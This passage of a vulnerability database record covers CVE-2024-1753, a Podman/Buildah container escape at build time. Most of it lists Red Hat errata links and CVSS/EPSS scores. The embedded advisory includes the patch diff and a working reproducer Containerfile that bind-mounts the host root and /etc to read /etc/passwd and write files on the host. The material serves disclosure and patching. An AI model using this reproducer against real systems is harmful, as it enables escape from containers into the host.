reference_url https://access.redhat.com/errata/RHSA-2024:1765
reference_id RHSA-2024:1765
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:1765
33
reference_url https://access.redhat.com/errata/RHSA-2024:1795
reference_id RHSA-2024:1795
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:1795
34
reference_url https://access.redhat.com/errata/RHSA-2024:1859
reference_id RHSA-2024:1859
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:1859
35
reference_url https://access.redhat.com/errata/RHSA-2024:1874
reference_id RHSA-2024:1874
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:1874
36
reference_url https://access.redhat.com/errata/RHSA-2024:1925
reference_id RHSA-2024:1925
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:1925
37
reference_url https://access.redhat.com/errata/RHSA-2024:1946
reference_id RHSA-2024:1946
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:1946
38
reference_url https://access.redhat.com/errata/RHSA-2024:2096
reference_id RHSA-2024:2096
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:2096
39
reference_url https://access.redhat.com/errata/RHSA-2024:2549
reference_id RHSA-2024:2549
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:2549
40
reference_url https://access.redhat.com/errata/RHSA-2024:2550
reference_id RHSA-2024:2550
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:2550
41
reference_url https://access.redhat.com/errata/RHSA-2024:2639
reference_id RHSA-2024:2639
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:2639
42
reference_url https://access.redhat.com/errata/RHSA-2024:2666
reference_id RHSA-2024:2666
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:2666
43
reference_url https://access.redhat.com/errata/RHSA-2024:2773
reference_id RHSA-2024:2773
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:2773
44
reference_url https://access.redhat.com/errata/RHSA-2024:2781
reference_id RHSA-2024:2781
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:2781
45
reference_url https://access.redhat.com/errata/RHSA-2024:2874
reference_id RHSA-2024:2874
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:2874
46
reference_url https://access.redhat.com/errata/RHSA-2024:2901
reference_id RHSA-2024:2901
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:2901
47
reference_url https://access.redhat.com/errata/RHSA-2024:3316
reference_id RHSA-2024:3316
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:3316
48
reference_url https://access.redhat.com/errata/RHSA-2024:3617
reference_id RHSA-2024:3617
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:3617
49
reference_url https://access.redhat.com/errata/RHSA-2024:3621
reference_id RHSA-2024:3621
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:3621
50
reference_url https://access.redhat.com/errata/RHSA-2024:3634
reference_id RHSA-2024:3634
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:3634
51
reference_url https://access.redhat.com/errata/RHSA-2024:3635
reference_id RHSA-2024:3635
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:3635
52
reference_url https://access.redhat.com/errata/RHSA-2024:3636
reference_id RHSA-2024:3636
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:3636
53
reference_url https://access.redhat.com/errata/RHSA-2024:3637
reference_id RHSA-2024:3637
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:3637
54
reference_url https://access.redhat.com/errata/RHSA-2024:3683
reference_id RHSA-2024:3683
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:3683
55
reference_url https://access.redhat.com/errata/RHSA-2024:3715
reference_id RHSA-2024:3715
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:3715
56
reference_url https://access.redhat.com/errata/RHSA-2024:3717
reference_id RHSA-2024:3717
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:3717
57
reference_url https://access.redhat.com/errata/RHSA-2024:3868
reference_id RHSA-2024:3868
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:3868
58
reference_url https://access.redhat.com/errata/RHSA-2024:4150
reference_id RHSA-2024:4150
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:4150
59
reference_url https://access.redhat.com/errata/RHSA-2024:4163
reference_id RHSA-2024:4163
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:4163
60
reference_url https://access.redhat.com/errata/RHSA-2024:4246
reference_id RHSA-2024:4246
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:4246
61
reference_url https://access.redhat.com/errata/RHSA-2024:4455
reference_id RHSA-2024:4455
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:4455
62
reference_url https://access.redhat.com/errata/RHSA-2024:4597
reference_id RHSA-2024:4597
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:4597
63
reference_url https://access.redhat.com/errata/RHSA-2024:4626
reference_id RHSA-2024:4626
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:4626
64
reference_url https://access.redhat.com/errata/RHSA-2024:5013
reference_id RHSA-2024:5013
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:5013
65
reference_url https://access.redhat.com/errata/RHSA-2024:5054
reference_id RHSA-2024:5054
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:5054
66
reference_url https://access.redhat.com/errata/RHSA-2024:5422
reference_id RHSA-2024:5422
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:5422
67
reference_url https://access.redhat.com/errata/RHSA-2024:6004
reference_id RHSA-2024:6004
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:6004
68
reference_url https://access.redhat.com/errata/RHSA-2024:6221
reference_id RHSA-2024:6221
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:6221
69
reference_url https://access.redhat.com/errata/RHSA-2024:6409
reference_id RHSA-2024:6409
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:6409
70
reference_url https://access.redhat.com/errata/RHSA-2024:7184
reference_id RHSA-2024:7184
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:7184
71
reference_url https://access.redhat.com/errata/RHSA-2024:7548
reference_id RHSA-2024:7548
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:7548
72
reference_url https://access.redhat.com/errata/RHSA-2024:8040
reference_id RHSA-2024:8040
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:8040
73
reference_url https://access.redhat.com/errata/RHSA-2024:8434
reference_id RHSA-2024:8434
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:8434
74
reference_url https://access.redhat.com/errata/RHSA-2024:8676
reference_id RHSA-2024:8676
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:8676
75
reference_url https://access.redhat.com/errata/RHSA-2024:8677
reference_id RHSA-2024:8677
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:8677
76
reference_url https://access.redhat.com/errata/RHSA-2024:8704
reference_id RHSA-2024:8704
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:8704
77
reference_url https://access.redhat.com/errata/RHSA-2024:9615
reference_id RHSA-2024:9615
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:9615
78
reference_url https://access.redhat.com/errata/RHSA-2025:0654
reference_id RHSA-2025:0654
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:0654
79
reference_url https://access.redhat.com/errata/RHSA-2025:0664
reference_id RHSA-2025:0664
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:0664
80
reference_url https://access.redhat.com/errata/RHSA-2025:4204
reference_id RHSA-2025:4204
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:4204
81
reference_url https://access.redhat.com/errata/RHSA-2025:9776
reference_id RHSA-2025:9776
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:9776
82
reference_url https://usn.ubuntu.com/6746-1/
reference_id USN-6746-1
reference_type
scores
url https://usn.ubuntu.com/6746-1/
83
reference_url https://usn.ubuntu.com/6746-2/
reference_id USN-6746-2
reference_type
scores
url https://usn.ubuntu.com/6746-2/
fixed_packages
0
url pkg:ebuild/app-containers/buildah@1.35.3
purl pkg:ebuild/app-containers/buildah@1.35.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:ebuild/app-containers/buildah@1.35.3
aliases CVE-2024-24786, GHSA-8r3f-844c-mc37
risk_score 3.4
exploitability 0.5
weighted_severity 6.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-f8ak-21d8-juff
4
url VCID-gyyv-8fkv-syh5
vulnerability_id VCID-gyyv-8fkv-syh5
summary 
Podman affected by CVE-2024-1753 container escape at build time
### Impact
_What kind of vulnerability is it? Who is impacted?_

Users running containers with root privileges allowing a container to run with read/write access to the host system files when selinux is not enabled.  With selinux enabled, some read access is allowed.

### Patches
From @nalind .  This is a patch for Buildah (https://github.com/containers/buildah).  Once fixed there, Buildah will be vendored into Podman.

```
# cat /root/cve-2024-1753.diff
--- internal/volumes/volumes.go
+++ internal/volumes/volumes.go
@@ -11,6 +11,7 @@ import (
 
 	"errors"
 
+	"github.com/containers/buildah/copier"
 	"github.com/containers/buildah/define"
 	"github.com/containers/buildah/internal"
 	internalParse "github.com/containers/buildah/internal/parse"
@@ -189,7 +190,11 @@ func GetBindMount(ctx *types.SystemContext, args []string, contextDir string, st
 	// buildkit parity: support absolute path for sources from current build context
 	if contextDir != "" {
 		// path should be /contextDir/specified path
-		newMount.Source = filepath.Join(contextDir, filepath.Clean(string(filepath.Separator)+newMount.Source))
+		evaluated, err := copier.Eval(contextDir, newMount.Source, copier.EvalOptions{})
+		if err != nil {
+			return newMount, "", err
+		}
+		newMount.Source = evaluated
 	} else {
 		// looks like its coming from `build run --mount=type=bind` allow using absolute path
 		// error out if no source is set
```
### Reproducer

Prior to testing, as root, add a memorable username to `/etc/passwd` via adduser or your favorite editor.   Also create a memorably named file in `/`.  Suggest: `touch /SHOULDNTSEETHIS.txt` and `adduser SHOULDNTSEETHIS`.  After testing, remember to remove both the file and the user from your system.

Use the following Containerfile

```
# cat ~/cve_Containerfile
FROM alpine as base

RUN ln -s / /rootdir
RUN ln -s /etc /etc2

FROM alpine

RUN echo "ls container root"
RUN ls -l /

RUN echo "With exploit show host root, not the container's root, and create /BIND_BREAKOUT in / on the host"
RUN --mount=type=bind,from=base,source=/rootdir,destination=/exploit,rw ls -l /exploit; touch /exploit/BIND_BREAKOUT; ls -l /exploit

RUN echo "With exploit show host /etc/passwd, not the container's, and create /BIND_BREAKOUT2 in /etc on the host"
RUN --mount=type=bind,rw,source=/etc2,destination=/etc2,from=base ls -l /; ls -l /etc2/passwd; cat /etc2/passwd; touch /etc2/BIND_BREAKOUT2; ls -l /etc2 
```

#### To Test

##### Testing with an older version of Podman with the issue
```
setenforce 0
podman build -f ~/cve_Containerfile .
```

As part of the printout from the build, you should be able to see the contents of the `/' and `/etc` directories, including the `/SHOULDNOTSEETHIS.txt` file that you created, and the contents of the `/etc/passwd` file which will include the `SHOULDNOTSEETHIS` user that you created.  In addition, the file `/BIND_BREAKOUT` and `/etc/BIND_BREAKOUT2` will exist on the host after the command is completed.  Be sure to remove those two files between tests.  

```
podman rm -a
podman rmi -a
rm /BIND_BREAKOUT
rm /etc/BIND_BREAKOUT2
setenforce 1
podman build -f ~/cve_Containerfile .
```
Neither the `/BIND_BREAKEOUT` or `/etc/BIND_BREAKOUT2` files should be created.  An error should be raised during the build when both files are trying to be created.  Also, errors will be raised when the build tries to display the contents of the `/etc/passwd` file, and nothing will be displayed from that file.  

However, the files in both the `/` and `/etc` directories on the host system will be displayed.

##### Testing with the patch

Use the same commands as testing with an older version of Podman.

When running using the patched version of Podman, regardless of the `setenforce` settings,  you should not see the file that you created or the user that you added.  Also the `/BIND_BREAKOUT` and the `/etc/BIND_BREAKOUT` will not exist on the host after the test completes.

NOTE: With the fix, the contents of the `/` and `/etc` directories, and the `/etc/passwd` file will be displayed, however, it will be the file and contents from the container image, and NOT the host system.  Also the `/BIND_BREAKOUT` and `/etc/BIND_BREAKOUT` files will be created in the container image.


### Workarounds
Ensure selinux controls are in place to avoid compromising sensitive system files and systems.  With "setenforce 0" set, which is not at all advised, the root file system is open for modification with this exploit.  With "setenfoce 1" set, which is the recommendation, files can not be changed.  However, the contents of the `/` directory can be displayed.  I.e., `ls -alF /` will show the contents of the host directory.

### References

Unknown.
references
0
reference_url https://access.redhat.com/errata/RHSA-2024:2049
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/
url https://access.redhat.com/errata/RHSA-2024:2049
1
reference_url https://access.redhat.com/errata/RHSA-2024:2055
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/
url https://access.redhat.com/errata/RHSA-2024:2055
2
reference_url https://access.redhat.com/errata/RHSA-2024:2064
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/
url https://access.redhat.com/errata/RHSA-2024:2064
3
reference_url https://access.redhat.com/errata/RHSA-2024:2066
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/
url https://access.redhat.com/errata/RHSA-2024:2066
4
reference_url https://access.redhat.com/errata/RHSA-2024:2077
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/
url https://access.redhat.com/errata/RHSA-2024:2077
5
reference_url https://access.redhat.com/errata/RHSA-2024:2084
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/
url https://access.redhat.com/errata/RHSA-2024:2084
6
reference_url https://access.redhat.com/errata/RHSA-2024:2089
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/
url https://access.redhat.com/errata/RHSA-2024:2089
7
reference_url https://access.redhat.com/errata/RHSA-2024:2090
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/
url https://access.redhat.com/errata/RHSA-2024:2090
8
reference_url https://access.redhat.com/errata/RHSA-2024:2097
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/
url https://access.redhat.com/errata/RHSA-2024:2097
9
reference_url https://access.redhat.com/errata/RHSA-2024:2098
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/
url https://access.redhat.com/errata/RHSA-2024:2098
10
reference_url https://access.redhat.com/errata/RHSA-2024:2548
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/
url https://access.redhat.com/errata/RHSA-2024:2548
11
reference_url https://access.redhat.com/errata/RHSA-2024:2645
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/
url https://access.redhat.com/errata/RHSA-2024:2645
12
reference_url https://access.redhat.com/errata/RHSA-2024:2669
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/
url https://access.redhat.com/errata/RHSA-2024:2669
13
reference_url https://access.redhat.com/errata/RHSA-2024:2672
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/
url https://access.redhat.com/errata/RHSA-2024:2672
14
reference_url https://access.redhat.com/errata/RHSA-2024:2784
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/
url https://access.redhat.com/errata/RHSA-2024:2784
15
reference_url https://access.redhat.com/errata/RHSA-2024:2877
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/
url https://access.redhat.com/errata/RHSA-2024:2877
16
reference_url https://access.redhat.com/errata/RHSA-2024:3254
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/
url https://access.redhat.com/errata/RHSA-2024:3254
17
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-1753.json
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-1753.json
18
reference_url https://access.redhat.com/security/cve/CVE-2024-1753
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/
url https://access.redhat.com/security/cve/CVE-2024-1753
19
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-1753
reference_id
reference_type
scores
0
value 0.00064
scoring_system epss
scoring_elements 0.19976
published_at 2026-04-02T12:55:00Z
1
value 0.00064
scoring_system epss
scoring_elements 0.20034
published_at 2026-04-04T12:55:00Z
2
value 0.00076
scoring_system epss
scoring_elements 0.22702
published_at 2026-04-21T12:55:00Z
3
value 0.00076
scoring_system epss
scoring_elements 0.22677
published_at 2026-04-07T12:55:00Z
4
value 0.00076
scoring_system epss
scoring_elements 0.22752
published_at 2026-04-08T12:55:00Z
5
value 0.00076
scoring_system epss
scoring_elements 0.22804
published_at 2026-04-09T12:55:00Z
6
value 0.00076
scoring_system epss
scoring_elements 0.22826
published_at 2026-04-11T12:55:00Z
7
value 0.00076
scoring_system epss
scoring_elements 0.22788
published_at 2026-04-12T12:55:00Z
8
value 0.00076
scoring_system epss
scoring_elements 0.22731
published_at 2026-04-13T12:55:00Z
9
value 0.00076
scoring_system epss
scoring_elements 0.22747
published_at 2026-04-16T12:55:00Z
10
value 0.00076
scoring_system epss
scoring_elements 0.22742
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-1753
20
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2265513
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/
url https://bugzilla.redhat.com/show_bug.cgi?id=2265513
21
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1753
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1753
22
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
23
reference_url https://github.com/containers/buildah/security/advisories/GHSA-pmf3-c36m-g5cf
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/
url https://github.com/containers/buildah/security/advisories/GHSA-pmf3-c36m-g5cf
24
reference_url https://github.com/containers/podman
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/containers/podman
25
reference_url https://github.com/containers/podman/security/advisories/GHSA-874v-pj72-92f3
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/
url https://github.com/containers/podman/security/advisories/GHSA-874v-pj72-92f3
26
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FCRZVUDOFM5CPREQKBEU2VK2QK62PSBP
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FCRZVUDOFM5CPREQKBEU2VK2QK62PSBP
27
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KOYMVMQ7RWMDTSKQTBO734BE3WQPI2AJ
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value 6.3
scoring_system cvssv4
